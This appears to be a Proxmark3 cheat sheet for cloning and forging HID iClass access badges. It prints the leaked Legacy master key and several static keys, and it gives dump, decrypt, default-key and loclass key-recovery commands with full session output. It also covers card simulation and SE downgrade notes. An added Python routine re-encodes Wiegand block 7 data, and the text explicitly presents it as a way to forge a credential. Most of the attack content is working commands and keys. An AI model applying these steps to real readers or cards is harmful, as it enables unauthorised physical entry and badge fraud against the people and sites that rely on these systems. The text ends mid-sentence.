HID iClass

Heart of Darkness key (the leaked iClass Legacy master key, loaded as key slot 0 below): aea684a6dab23278

Pico Pass

iClass Legacy

  • The Legacy cipher and its master key have been leaked (the Heart of Darkness key above).
  • A card can also be cloned by copying its encrypted data as-is: the credential in blocks 7-9 is encrypted with a static key that does not depend on the CSN, so the copy still works even when the target card has a different CSN.

List the static keys loaded in the client (slots 0-3 are pre-loaded; slot 4 is empty until `hf iclass chk` finds a key):

[usb] pm3 --> hf iclass managekeys -p
[=] idx| key
[=] ---+------------------------
[=]  0 | AE A6 84 A6 DA B2 32 78
[=]  1 | FD CB 5A 52 EA 8F 30 90
[=]  2 | F0 E1 D2 C3 B4 A5 96 87
[=]  3 | 76 65 54 43 32 21 10 00
[=]  4 |
[=]  5 |
[=]  6 |
[=]  7 |
[=] ---+------------------------

Dump with known keys:

# Try each loaded key slot in turn; `--ki 4` only works after `hf iclass chk` has placed a found key in slot 4
hf iclass dump --ki 0
hf iclass dump --ki 1
hf iclass dump --ki 2
hf iclass dump --ki 3
hf iclass dump --ki 4

Decrypt encrypted user data (blocks 7-9 are 3DES-encrypted; `hf iclass decrypt` uses the 16-byte key in `iclass_decryptionkey.bin`):

[usb] pm3 --> hf iclass dump --ki 4
[+] Using AA1 (debit) key[4] 20 20 66 66 66 66 88 88
[=] Card has at least 2 application areas. AA1 limit 18 (0x12) AA2 limit 31 (0x1F)
[=] --------------------------- Tag memory ----------------------------
[=]  block#  | data                    | ascii    |lck| info
[=] ---------+-------------------------+----------+---+----------------
[=]   0/0x00 | F8 BC 03 14 FE FF 12 E0 | ........ |   | CSN
[=]   1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< |   | Config
[=]   2/0x02 | FF FF FF FF FD FF FF FF | ........ |   | E-purse
[=]   3/0x03 | 44 DC D1 AF C0 97 7F E2 | D....... |   | Debit
[=]   4/0x04 | FF FF FF FF FF FF FF FF | ........ |   | Credit
[=]   5/0x05 | FF FF FF FF FF FF FF FF | ........ |   | AIA
[=]   6/0x06 | 03 03 03 03 00 03 E0 17 | ........ |   | User / HID CFG
[=]   7/0x07 | 8B EB ED DD 53 68 59 3B | ....ShY; |   | User / Enc Cred
[=]   8/0x08 | 2A D4 C8 21 1F 99 68 71 | *..!..hq |   | User / Enc Cred
[=]   9/0x09 | 2A D4 C8 21 1F 99 68 71 | *..!..hq |   | User / Enc Cred
[=]  10/0x0A | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  11/0x0B | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  12/0x0C | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  13/0x0D | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  14/0x0E | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  15/0x0F | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  16/0x10 | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  17/0x11 | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  18/0x12 | FF FF FF FF FF FF FF FF | ........ |   | User
[=] ---------+-------------------------+----------+---+----------------
[?] yellow = legacy credential
[+] saving dump file - 19 blocks read
[+] saved 152 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump.bin
[+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump.json
[?] Try `hf iclass decrypt -f` to decrypt dump file
[?] Try `hf iclass view -f` to view dump file

[usb] pm3 --> hf iclass decrypt -f hf-iclass-F8BC0314FEFF12E0-dump.bin
[+] loaded 152 bytes from binary file `hf-iclass-F8BC0314FEFF12E0-dump.bin`
[+] loaded 16 bytes from binary file `iclass_decryptionkey.bin`
[!] Actual file len 152 vs HID app-limit len 144
[=] Setting limit to 144
[+] saved 152 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump-decrypted.bin
[+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump-decrypted.json
[=] --------------------------- Tag memory ----------------------------
[=]  block#  | data                    | ascii    |lck| info
[=] ---------+-------------------------+----------+---+----------------
[=]   0/0x00 | F8 BC 03 14 FE FF 12 E0 | ........ |   | CSN
[=]   1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< |   | Config
[=]   2/0x02 | FF FF FF FF FD FF FF FF | ........ |   | E-purse
[=]   3/0x03 | 44 DC D1 AF C0 97 7F E2 | D....... |   | Debit
[=]   4/0x04 | FF FF FF FF FF FF FF FF | ........ |   | Credit
[=]   5/0x05 | FF FF FF FF FF FF FF FF | ........ |   | AIA
[=]   6/0x06 | 03 03 03 03 00 03 E0 14 | ........ |   | User / HID CFG
[=]   7/0x07 | 00 00 00 00 05 97 61 50 | ......aP |   | User / Cred
[=]   8/0x08 | 00 00 00 00 00 00 00 00 | ........ |   | User / Cred
[=]   9/0x09 | 00 00 00 00 00 00 00 00 | ........ |   | User / Cred
[=]  10/0x0A | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  11/0x0B | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  12/0x0C | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  13/0x0D | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  14/0x0E | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  15/0x0F | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  16/0x10 | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  17/0x11 | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  18/0x12 | FF FF FF FF FF FF FF FF | ........ |   | User
[=] ---------+-------------------------+----------+---+----------------
[?] yellow = legacy credential
[=] Block 7 decoder
[+] Binary..................... 101100101110110000101010000
[=] Wiegand decode
[+] [H10301  ] HID H10301 26-bit   FC: 203   CN: 45224   parity ( ok )
[+] [ind26   ] Indala 26-bit       FC: 3259  CN: 168     parity ( ok )
[=] found 2 matching formats
[=] -----------------------------------------------------------------
[usb] pm3 -->
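The "Block 7 decoder" step above, reproduced in Python as an added example (this is not Proxmark3 code). It decodes the H10301 26-bit frame from a decrypted block 7, verifies both parity bits, and re-encodes a facility code / card number into the block 7 value you would write to a clone. The two sample blocks are the decrypted block 7 values from the dumps on this page. One assumption not stated on the page: Proxmark3's "Binary" line is the block taken as a big-endian integer with leading zeros dropped, the highest set bit being a sentinel that marks the format length.

```python
from __future__ import annotations

# Decrypted block 7 values copied from the two `hf iclass decrypt` outputs on this page.
SAMPLE_LEGACY = bytes.fromhex("0000000005976150")   # decodes to FC 203, CN 45224
SAMPLE_ELITE = bytes.fromhex("0000000005976304")    # decodes to FC 203, CN 45442


def block7_to_wiegand(block: bytes) -> tuple[int, int]:
    """Return (bit_length, frame) for the Wiegand data held in a block 7 value.

    Assumption: the block is a big-endian integer whose highest set bit is a
    sentinel; the bits below it are the Wiegand frame and their count is the format length.
    """
    value = int.from_bytes(block, "big")
    if value == 0:
        raise ValueError("block 7 is empty")
    length = value.bit_length() - 1            # drop the sentinel bit
    return length, value & ((1 << length) - 1)


def decode_h10301(block: bytes) -> tuple[int, int]:
    """Decode a 26-bit H10301 frame from block 7 and check both parity bits.

    Frame layout, first transmitted bit first:
      bit 0      even parity over bits 1..12
      bits 1..8  facility code
      bits 9..24 card number
      bit 25     odd parity over bits 13..24
    Bit 0 is the most significant bit of the 26-bit integer `w`.
    """
    length, w = block7_to_wiegand(block)
    if length != 26:
        raise ValueError(f"not a 26-bit frame (got {length} bits)")
    p_even = (w >> 25) & 1
    fc = (w >> 17) & 0xFF
    cn = (w >> 1) & 0xFFFF
    p_odd = w & 1
    if bin((w >> 13) & 0xFFF).count("1") % 2 != p_even:
        raise ValueError("even parity check failed")
    if (bin((w >> 1) & 0xFFF).count("1") + p_odd) % 2 != 1:
        raise ValueError("odd parity check failed")
    return fc, cn


def encode_h10301(fc: int, cn: int) -> bytes:
    """Build the 8-byte block 7 value (sentinel + 26-bit frame) for an FC / CN pair."""
    if not 0 <= fc <= 0xFF or not 0 <= cn <= 0xFFFF:
        raise ValueError("FC must fit in 8 bits and CN in 16 bits")
    w = (fc << 17) | (cn << 1)
    p_even = bin((w >> 13) & 0xFFF).count("1") % 2          # make bits 0..12 even
    p_odd = (bin((w >> 1) & 0xFFF).count("1") + 1) % 2      # make bits 13..25 odd
    w |= (p_even << 25) | p_odd
    return ((1 << 26) | w).to_bytes(8, "big")


def binary_string(block: bytes) -> str:
    """Reproduce Proxmark3's 'Binary.....' line: the block with leading zeros dropped."""
    return bin(int.from_bytes(block, "big"))[2:]


if __name__ == "__main__":
    for name, blk in (("legacy", SAMPLE_LEGACY), ("elite", SAMPLE_ELITE)):
        fc, cn = decode_h10301(blk)
        print(f"{name}: binary {binary_string(blk)} -> FC {fc} CN {cn}")
        assert encode_h10301(fc, cn) == blk     # round-trip back to the dumped block
```

Feeding `encode_h10301` a new card number gives the plaintext block 7 for a forged Legacy credential; it still has to be 3DES-encrypted with the static key before being written, which is what `hf iclass encrypt` does and this example deliberately leaves out.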

Dump with a raw key given on the command line instead of a key slot:

hf iclass dump -k "5B 7C 62 C4 91 C1 1B 39"

Use Default Keys:

hf iclass chk -f iclass_default_keys.dic

Simulate a card to the reader to recover its key:

# Make the Proxmark act as an iClass card and collect the reader's CSN/NR/MAC responses
hf iclass sim -t 2
# Then run loclass over the collected MACs to recover the reader's Elite (custom) master key
hf iclass loclass -f ../dumps/iclass_mac_attack.bin

Simulate other cards:

# Simulate a specific CSN
hf iclass sim -t 0 --csn 031FEC8AF7FF12E0
# Simulate with the default CSN
hf iclass sim -t 1
# Simulate a full 2K tag (load the dump into emulator memory with `hf iclass eload` first)
hf iclass sim -t 3
# Reader attack
hf iclass sim -t 4

iClass Elite

loclass attack

Test Known Keys:

[usb] pm3 --> hf iclass chk -f iclass_default_keys.dic --elite
[+] loaded 28 keys from dictionary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\dictionaries/iclass_default_keys.dic
[+] Reading tag CSN / CCNR...
[+] CSN: 97 F5 15 14 FE FF 12 E0
[+] CCNR: FC FF FF FF FF FF FF FF 00 00 00 00
[=] Generating diversified keys using elite algo
[+] Searching for DEBIT key...
[+] Found valid key 20 20 66 66 66 66 88 88
[+] time in iclass chk 0.8 seconds
[+] Added key to keyslot 4
[?] Try `hf iclass managekeys -p` to view keys

List known Keys:

[usb] pm3 --> hf iclass managekeys -p
[=] idx| key
[=] ---+------------------------
[=]  0 | AE A6 84 A6 DA B2 32 78
[=]  1 | FD CB 5A 52 EA 8F 30 90
[=]  2 | F0 E1 D2 C3 B4 A5 96 87
[=]  3 | 76 65 54 43 32 21 10 00
[=]  4 | 20 20 66 66 66 66 88 88
[=]  5 |
[=]  6 |
[=]  7 |
[=] ---+------------------------

Dump Card:

[usb] pm3 --> hf iclass dump --ki 4 --elite
[+] Using AA1 (debit) key[4] 20 20 66 66 66 66 88 88
[=] Card has at least 2 application areas. AA1 limit 18 (0x12) AA2 limit 31 (0x1F)
[=] --------------------------- Tag memory ----------------------------
[=]  block#  | data                    | ascii    |lck| info
[=] ---------+-------------------------+----------+---+----------------
[=]   0/0x00 | 97 F5 15 14 FE FF 12 E0 | ........ |   | CSN
[=]   1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< |   | Config
[=]   2/0x02 | FC FF FF FF FF FF FF FF | ........ |   | E-purse
[=]   3/0x03 | 5A 81 46 19 E0 47 82 89 | Z.F..G.. |   | Debit
[=]   4/0x04 | FF FF FF FF FF FF FF FF | ........ |   | Credit
[=]   5/0x05 | FF FF FF FF FF FF FF FF | ........ |   | AIA
[=]   6/0x06 | 03 03 03 03 00 03 E0 17 | ........ |   | User / HID CFG
[=]   7/0x07 | 40 9D C6 43 21 42 A4 C6 | @..C!B.. |   | User / Enc Cred
[=]   8/0x08 | 2A D4 C8 21 1F 99 68 71 | *..!..hq |   | User / Enc Cred
[=]   9/0x09 | 2A D4 C8 21 1F 99 68 71 | *..!..hq |   | User / Enc Cred
[=]  10/0x0A | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  11/0x0B | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  12/0x0C | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  13/0x0D | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  14/0x0E | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  15/0x0F | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  16/0x10 | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  17/0x11 | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  18/0x12 | FF FF FF FF FF FF FF FF | ........ |   | User
[=] ---------+-------------------------+----------+---+----------------
[?] yellow = legacy credential

Decrypt Card:

[usb] pm3 --> hf iclass decrypt -f hf-iclass-97F51514FEFF12E0-dump.bin
[+] loaded 152 bytes from binary file `hf-iclass-97F51514FEFF12E0-dump.bin`
[+] loaded 16 bytes from binary file `iclass_decryptionkey.bin`
[!] Actual file len 152 vs HID app-limit len 144
[=] Setting limit to 144
[+] saved 152 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-97F51514FEFF12E0-dump-decrypted.bin
[+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-97F51514FEFF12E0-dump-decrypted.json
[=] --------------------------- Tag memory ----------------------------
[=]  block#  | data                    | ascii    |lck| info
[=] ---------+-------------------------+----------+---+----------------
[=]   0/0x00 | 97 F5 15 14 FE FF 12 E0 | ........ |   | CSN
[=]   1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< |   | Config
[=]   2/0x02 | FC FF FF FF FF FF FF FF | ........ |   | E-purse
[=]   3/0x03 | 5A 81 46 19 E0 47 82 89 | Z.F..G.. |   | Debit
[=]   4/0x04 | FF FF FF FF FF FF FF FF | ........ |   | Credit
[=]   5/0x05 | FF FF FF FF FF FF FF FF | ........ |   | AIA
[=]   6/0x06 | 03 03 03 03 00 03 E0 14 | ........ |   | User / HID CFG
[=]   7/0x07 | 00 00 00 00 05 97 63 04 | ......c. |   | User / Cred
[=]   8/0x08 | 00 00 00 00 00 00 00 00 | ........ |   | User / Cred
[=]   9/0x09 | 00 00 00 00 00 00 00 00 | ........ |   | User / Cred
[=]  10/0x0A | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  11/0x0B | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  12/0x0C | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  13/0x0D | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  14/0x0E | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  15/0x0F | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  16/0x10 | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  17/0x11 | FF FF FF FF FF FF FF FF | ........ |   | User
[=]  18/0x12 | FF FF FF FF FF FF FF FF | ........ |   | User
[=] ---------+-------------------------+----------+---+----------------
[?] yellow = legacy credential
[=] Block 7 decoder
[+] Binary..................... 101100101110110001100000100
[=] Wiegand decode
[+] [H10301  ] HID H10301 26-bit   FC: 203   CN: 45442   parity ( ok )
[+] [ind26   ] Indala 26-bit       FC: 3259  CN: 386     parity ( ok )
[=] found 2 matching formats
[=] -----------------------------------------------------------------

iClass SR

  • Transitional card between iClass Legacy and iClass SE: it carries the legacy credential alongside an SIO, so it works with both reader generations

iClass SE

  • Uses the PicoPass protocol
  • Standard key and KDF have not been leaked
  • Can be downgraded: an SE reader that is still configured to accept Legacy or SR cards will take the same credential presented on a Legacy or SR card
  • Contains a smart card
    • Digital signature authentication
    • Encrypted

SIO: encrypted Wiegand data (ASN.1-encoded) plus an authentication MAC. Cloning the data to another card won't work, because the keys are diversified from the UID/CSN and the SIO is bound to the card it was written to.

Dumping SIO / replaying NR-MAC

If you make a card with the same encrypted data